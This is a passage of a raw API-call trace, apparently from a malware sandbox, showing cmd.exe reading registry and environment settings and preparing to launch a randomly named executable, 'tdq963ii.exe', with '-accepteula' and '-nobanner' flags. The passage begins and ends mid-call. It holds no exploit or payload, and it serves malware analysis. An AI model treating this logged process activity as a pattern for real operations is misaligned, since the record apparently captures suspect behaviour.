AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0236.861] GetConsoleOutputCP () returned 0x1b5 [0236.861] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0236.861] SetConsoleCtrlHandler (HandlerRoutine=0x49dbe72a, Add=1) returned 1 [0236.861] _get_osfhandle (_FileHandle=1) returned 0x80 [0236.861] SetConsoleMode (hConsoleHandle=0x80, dwMode=0x0) returned 0 [0236.861] _get_osfhandle (_FileHandle=1) returned 0x80 [0236.861] GetConsoleMode (in: hConsoleHandle=0x80, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 0 [0236.862] _get_osfhandle (_FileHandle=0) returned 0x3 [0236.862] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0236.862] GetEnvironmentStringsW () returned 0x6221e0* [0236.862] GetProcessHeap () returned 0x610000 [0236.862] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb86) returned 0x622d70 [0236.862] FreeEnvironmentStringsW (penv=0x6221e0) returned 1 [0236.863] GetProcessHeap () returned 0x610000 [0236.863] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x4) returned 0x622060 [0236.863] GetEnvironmentStringsW () returned 0x6221e0* [0236.863] GetProcessHeap () returned 0x610000 [0236.863] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb86) returned 0x623900 [0236.863] FreeEnvironmentStringsW (penv=0x6221e0) returned 1 [0236.863] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee9d4 | out: phkResult=0x1ee9d4*=0x68) returned 0x0 [0236.863] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee9dc, lpData=0x1ee9e0, lpcbData=0x1ee9d8*=0x1000 | out: lpType=0x1ee9dc*=0x0, lpData=0x1ee9e0*=0x0, lpcbData=0x1ee9d8*=0x1000) returned 0x2 [0236.863] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee9dc, lpData=0x1ee9e0, lpcbData=0x1ee9d8*=0x1000 | out: lpType=0x1ee9dc*=0x4, lpData=0x1ee9e0*=0x1, lpcbData=0x1ee9d8*=0x4) returned 0x0 [0236.863] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee9dc, lpData=0x1ee9e0, lpcbData=0x1ee9d8*=0x1000 | out: lpType=0x1ee9dc*=0x0, lpData=0x1ee9e0*=0x1, lpcbData=0x1ee9d8*=0x1000) returned 0x2 [0236.863] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee9dc, lpData=0x1ee9e0, lpcbData=0x1ee9d8*=0x1000 | out: lpType=0x1ee9dc*=0x4, lpData=0x1ee9e0*=0x0, lpcbData=0x1ee9d8*=0x4) returned 0x0 [0236.864] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee9dc, lpData=0x1ee9e0, lpcbData=0x1ee9d8*=0x1000 | out: lpType=0x1ee9dc*=0x4, lpData=0x1ee9e0*=0x40, lpcbData=0x1ee9d8*=0x4) returned 0x0 [0236.864] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee9dc, lpData=0x1ee9e0, lpcbData=0x1ee9d8*=0x1000 | out: lpType=0x1ee9dc*=0x4, lpData=0x1ee9e0*=0x40, lpcbData=0x1ee9d8*=0x4) returned 0x0 [0236.864] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee9dc, lpData=0x1ee9e0, lpcbData=0x1ee9d8*=0x1000 | out: lpType=0x1ee9dc*=0x0, lpData=0x1ee9e0*=0x40, lpcbData=0x1ee9d8*=0x1000) returned 0x2 [0236.864] RegCloseKey (hKey=0x68) returned 0x0 [0236.864] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1ee9d4 | out: phkResult=0x1ee9d4*=0x68) returned 0x0 [0236.864] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1ee9dc, lpData=0x1ee9e0, lpcbData=0x1ee9d8*=0x1000 | out: lpType=0x1ee9dc*=0x0, lpData=0x1ee9e0*=0x40, lpcbData=0x1ee9d8*=0x1000) returned 0x2 [0236.864] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1ee9dc, lpData=0x1ee9e0, lpcbData=0x1ee9d8*=0x1000 | out: lpType=0x1ee9dc*=0x4, lpData=0x1ee9e0*=0x1, lpcbData=0x1ee9d8*=0x4) returned 0x0 [0236.864] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1ee9dc, lpData=0x1ee9e0, lpcbData=0x1ee9d8*=0x1000 | out: lpType=0x1ee9dc*=0x0, lpData=0x1ee9e0*=0x1, lpcbData=0x1ee9d8*=0x1000) returned 0x2 [0236.864] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1ee9dc, lpData=0x1ee9e0, lpcbData=0x1ee9d8*=0x1000 | out: lpType=0x1ee9dc*=0x4, lpData=0x1ee9e0*=0x0, lpcbData=0x1ee9d8*=0x4) returned 0x0 [0236.864] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1ee9dc, lpData=0x1ee9e0, lpcbData=0x1ee9d8*=0x1000 | out: lpType=0x1ee9dc*=0x4, lpData=0x1ee9e0*=0x9, lpcbData=0x1ee9d8*=0x4) returned 0x0 [0236.865] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1ee9dc, lpData=0x1ee9e0, lpcbData=0x1ee9d8*=0x1000 | out: lpType=0x1ee9dc*=0x4, lpData=0x1ee9e0*=0x9, lpcbData=0x1ee9d8*=0x4) returned 0x0 [0236.865] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1ee9dc, lpData=0x1ee9e0, lpcbData=0x1ee9d8*=0x1000 | out: lpType=0x1ee9dc*=0x0, lpData=0x1ee9e0*=0x9, lpcbData=0x1ee9d8*=0x1000) returned 0x2 [0236.865] RegCloseKey (hKey=0x68) returned 0x0 [0236.865] time (in: timer=0x0 | out: timer=0x0) returned 0x5f51e303 [0236.865] srand (_Seed=0x5f51e303) [0236.865] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"Dotted_Line.jtp\" -nobanner" [0236.865] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c tdq963ii.exe -accepteula \"Dotted_Line.jtp\" -nobanner" [0236.866] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0236.866] GetProcessHeap () returned 0x610000 [0236.866] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x210) returned 0x624490 [0236.866] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x624498, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0236.867] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0236.867] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0236.867] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0236.867] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.867] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0236.867] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0236.867] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0236.867] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0236.867] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0236.867] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0236.867] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0236.867] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0236.867] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0236.867] GetProcessHeap () returned 0x610000 [0236.867] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x54) returned 0x6246a8 [0236.867] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef7a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0236.868] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef7a0, lpFilePart=0x1ef79c | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1ef79c*="Desktop") returned 0x25 [0236.868] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0236.868] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef51c | out: lpFindFileData=0x1ef51c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x622070 [0236.868] FindClose (in: hFindFile=0x622070 | out: hFindFile=0x622070) returned 1 [0236.868] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1ef51c | out: lpFindFileData=0x1ef51c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x622070 [0236.868] FindClose (in: hFindFile=0x622070 | out: hFindFile=0x622070) returned 1 [0236.868] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0236.869] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1ef51c | out: lpFindFileData=0x1ef51c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x622070 [0236.869] FindClose (in: hFindFile=0x622070 | out: hFindFile=0x622070) returned 1 [0236.869] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0236.869] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0236.869] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0236.869] GetProcessHeap () returned 0x610000 [0236.869] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x622d70 | out: hHeap=0x610000) returned 1 [0236.869] GetEnvironmentStringsW () returned 0x6221e0* [0236.869] GetProcessHeap () returned 0x610000 [0236.869] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0xb86) returned 0x622d70 [0236.869] FreeEnvironmentStringsW (penv=0x6221e0) returned 1 [0236.869] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0236.869] GetProcessHeap () returned 0x610000 [0236.869] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6246a8 | out: hHeap=0x610000) returned 1 [0236.869] GetProcessHeap () returned 0x610000 [0236.869] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400e) returned 0x624f08 [0236.870] GetProcessHeap () returned 0x610000 [0236.870] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x76) returned 0x628f38 [0236.870] GetProcessHeap () returned 0x610000 [0236.870] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x624f08 | out: hHeap=0x610000) returned 1 [0236.870] GetConsoleOutputCP () returned 0x1b5 [0236.871] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0236.871] GetUserDefaultLCID () returned 0x409 [0236.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49dc4950, cchData=8 | out: lpLCData=":") returned 2 [0236.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef8e0, cchData=128 | out: lpLCData="0") returned 2 [0236.871] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef8e0, cchData=128 | out: lpLCData="0") returned 2 [0236.872] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef8e0, cchData=128 | out: lpLCData="1") returned 2 [0236.872] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49dc4940, cchData=8 | out: lpLCData="/") returned 2 [0236.872] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49dc4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0236.872] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49dc4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0236.872] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49dc4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0236.872] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49dc4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0236.872] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49dc4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0236.872] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49dc4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0236.872] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49dc4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0236.872] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49dc4930, cchData=8 | out: lpLCData=".") returned 2 [0236.872] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49dc4920, cchData=8 | out: lpLCData=",") returned 2 [0236.872] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0236.873] GetProcessHeap () returned 0x610000 [0236.873] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x20c) returned 0x6221e0 [0236.873] GetConsoleTitleW (in: lpConsoleTitle=0x6221e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0237.444] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0237.444] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileExW") returned 0x76d63b92 [0237.444] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0237.444] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleInputExeNameW") returned 0x76d5a79d [0237.446] GetProcessHeap () returned 0x610000 [0237.446] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x400a) returned 0x624f08 [0237.446] GetProcessHeap () returned 0x610000 [0237.446] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x624f08 | out: hHeap=0x610000) returned 1 [0237.447] _wcsicmp (_String1="tdq963ii.exe", _String2=")") returned 75 [0237.447] _wcsicmp (_String1="FOR", _String2="tdq963ii.exe") returned -14 [0237.447] _wcsicmp (_String1="FOR/?", _String2="tdq963ii.exe") returned -14 [0237.447] _wcsicmp (_String1="IF", _String2="tdq963ii.exe") returned -11 [0237.447] _wcsicmp (_String1="IF/?", _String2="tdq963ii.exe") returned -11 [0237.447] _wcsicmp (_String1="REM", _String2="tdq963ii.exe") returned -2 [0237.447] _wcsicmp (_String1="REM/?", _String2="tdq963ii.exe") returned -2 [0237.447] GetProcessHeap () returned 0x610000 [0237.447] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x58) returned 0x6246a8 [0237.447] GetProcessHeap () returned 0x610000 [0237.448] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x22) returned 0x6223f8 [0237.449] GetProcessHeap () returned 0x610000 [0237.449] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x5a) returned 0x622428 [0237.449] GetConsoleTitleW (in: lpConsoleTitle=0x1ef5d8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0237.450] GetFileAttributesW (lpFileName="tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x20 [0237.450] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0237.450] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0237.450] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0237.450] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0237.450] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0237.450] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0237.450] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0237.450] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0237.450] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0237.450] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0237.450] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0237.450] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0237.450] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="DIR") returned 16 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="ERASE") returned 15 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="DEL") returned 16 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="TYPE") returned -21 [0237.451] _wcsicmp (_String1="tdq963ii.exe", _String2="COPY") returned 17 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="CD") returned 17 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="CHDIR") returned 17 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="RENAME") returned 2 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="REN") returned 2 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="ECHO") returned 15 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="SET") returned 1 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="PAUSE") returned 4 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="DATE") returned 16 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="TIME") returned -5 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="PROMPT") returned 4 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="MD") returned 7 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="MKDIR") returned 7 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="RD") returned 2 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="RMDIR") returned 2 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="PATH") returned 4 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="GOTO") returned 13 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="SHIFT") returned 1 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="CLS") returned 17 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="CALL") returned 17 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="VERIFY") returned -2 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="VER") returned -2 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="VOL") returned -2 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="EXIT") returned 15 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="SETLOCAL") returned 1 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="ENDLOCAL") returned 15 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="TITLE") returned -5 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="START") returned 1 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="DPATH") returned 16 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="KEYS") returned 9 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="MOVE") returned 7 [0237.452] _wcsicmp (_String1="tdq963ii.exe", _String2="PUSHD") returned 4 [0237.453] _wcsicmp (_String1="tdq963ii.exe", _String2="POPD") returned 4 [0237.453] _wcsicmp (_String1="tdq963ii.exe", _String2="ASSOC") returned 19 [0237.453] _wcsicmp (_String1="tdq963ii.exe", _String2="FTYPE") returned 14 [0237.453] _wcsicmp (_String1="tdq963ii.exe", _String2="BREAK") returned 18 [0237.453] _wcsicmp (_String1="tdq963ii.exe", _String2="COLOR") returned 17 [0237.453] _wcsicmp (_String1="tdq963ii.exe", _String2="MKLINK") returned 7 [0237.453] _wcsicmp (_String1="tdq963ii.exe", _String2="FOR") returned 14 [0237.453] _wcsicmp (_String1="tdq963ii.exe", _String2="IF") returned 11 [0237.453] _wcsicmp (_String1="tdq963ii.exe", _String2="REM") returned 2 [0237.454] GetProcessHeap () returned 0x610000 [0237.454] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x210) returned 0x622490 [0237.454] GetProcessHeap () returned 0x610000 [0237.454] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x74) returned 0x628fb8 [0237.454] _wcsnicmp (_String1="tdq9", _String2="cmd ", _MaxCount=0x4) returned 17 [0237.454] GetProcessHeap () returned 0x610000 [0237.454] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x418) returned 0x6226a8 [0237.454] SetErrorMode (uMode=0x0) returned 0x0 [0237.454] SetErrorMode (uMode=0x1) returned 0x0 [0237.454] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6226b0, lpFilePart=0x1ef0f8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1ef0f8*="Desktop") returned 0x25 [0237.455] SetErrorMode (uMode=0x0) returned 0x1 [0237.455] GetProcessHeap () returned 0x610000 [0237.455] RtlReAllocateHeap (Heap=0x610000, Flags=0x0, Ptr=0x6226a8, Size=0x6e) returned 0x6226a8 [0237.455] GetProcessHeap () returned 0x610000 [0237.455] RtlSizeHeap (HeapHandle=0x610000, Flags=0x0, MemoryPointer=0x6226a8) returned 0x6e [0237.455] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0237.455] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0237.455] GetProcessHeap () returned 0x610000 [0237.455] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x120) returned 0x622720 [0237.455] GetProcessHeap () returned 0x610000 [0237.455] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x8, Size=0x238) returned 0x622848 [0237.465] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0237.465] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe", fInfoLevelId=0x1, lpFindFileData=0x1eee94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eee94) returned 0x6229f8 [0237.466] GetProcessHeap () returned 0x610000 [0237.466] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x14) returned 0x622a38 [0237.466] FindClose (in: hFindFile=0x6229f8 | out: hFindFile=0x6229f8) returned 1 [0237.466] _wcsicmp (_String1=".exe", _String2=".CMD") returned 2 [0237.466] _wcsicmp (_String1=".exe", _String2=".BAT") returned 3 [0237.466] GetConsoleTitleW (in: lpConsoleTitle=0x1ef36c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0237.466] InitializeProcThreadAttributeList (in: lpAttributeList=0x1ef1f4, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1ef2bc | out: lpAttributeList=0x1ef1f4, lpSize=0x1ef2bc) returned 1 [0237.466] UpdateProcThreadAttribute (in: lpAttributeList=0x1ef1f4, dwFlags=0x0, Attribute=0x60001, lpValue=0x1ef2b4, cbSize=0x4, lpPreviousValue=0x0, 